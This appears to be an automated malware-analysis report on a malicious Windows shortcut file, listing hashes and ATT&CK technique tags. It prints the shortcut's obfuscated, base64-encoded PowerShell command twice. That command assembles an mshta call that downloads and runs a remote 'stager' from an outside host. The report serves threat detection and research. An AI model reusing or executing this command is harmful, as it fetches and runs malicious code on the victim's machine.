Malicious

04547c546f876f2809b3c94c5d659766

LNK File | MD5: 04547c546f876f2809b3c94c5d659766 | Size: 2.84 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
Hash | Hash Value
MD5 | 04547c546f876f2809b3c94c5d659766
Sha1 | e91773fc29d2307b6f912c4beb0b5a5badb3c8db
Sha256 | 1156ddbe6effa99cff7a6af27b323ac1d257e1352549cc5407287c371e6b83ca
Sha384 | 467ecb730aa018328228111e1efb970ef99d829c506e7ab45308580e5295a2705c5e7eff38f03287d6436c221760e228
Sha512 | 35aa9f7f435ca678af9c789b1264ed57b2399caa972b3fc7449903589aeb186a8cb4ad7a40abe16a64e4af5c2d72718e1e72476325e28adaf1f6bd165c81f7ca
SSDeep | 48:8y5aaz5k7Rm6k7xapLaMbLYmvfdJ91Ir:8y5Tz67MP7xLWL7jbI
TLSH | 565186281AF211FEFA73C6B99BF573F34522FBD79D2586BC108062854622104B467A3A
File Structure
04547c546f876f2809b3c94c5d659766
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAHMAXgBoAF4AXgB0AGEAIABoAF4AXgBeAF4AdAB0AF4AXgBwAHMAXgBeAF4AXgA6AF4AXgBeAF4ALwBeAF4ALwBeAF4AXgBzAF4AXgBeAF4AawBeAF4AXgBeAGkAbgBeAF4AXgBeAHMAbwBuAF4AcwBrAF4AXgBeAF4AaQBuAF4AXgBeAHMAXgBeAG0AXgBeAF4AYQByAF4AXgBeAF4AawBeAF4AXgBlAF4AXgB0AF4AXgAuAF4AXgBeAF4AaQBeAF4AXgBuAF4AXgBmAG8AXgBeAF4ALwBhAHAAXgBeAF4AXgBwAF4AXgAvAHMAXgBeAF4AdABhAGcAXgBlAF4AXgBeAHIALgBeAF4AbQBeAF4AXgBwAF4AXgBeAF4ANABeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAHMAXgBoAF4AXgB0AGEAIABoAF4AXgBeAF4AdAB0AF4AXgBwAHMAXgBeAF4AXgA6AF4AXgBeAF4ALwBeAF4ALwBeAF4AXgBzAF4AXgBeAF4AawBeAF4AXgBeAGkAbgBeAF4AXgBeAHMAbwBuAF4AcwBrAF4AXgBeAF4AaQBuAF4AXgBeAHMAXgBeAG0AXgBeAF4AYQByAF4AXgBeAF4AawBeAF4AXgBlAF4AXgB0AF4AXgAuAF4AXgBeAF4AaQBeAF4AXgBuAF4AXgBmAG8AXgBeAF4ALwBhAHAAXgBeAF4AXgBwAF4AXgAvAHMAXgBeAF4AdABhAGcAXgBlAF4AXgBeAHIALgBeAF4AbQBeAF4AXgBwAF4AXgBeAF4ANABeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA="

04547c546f876f2809b3c94c5d659766 (2.84 KB)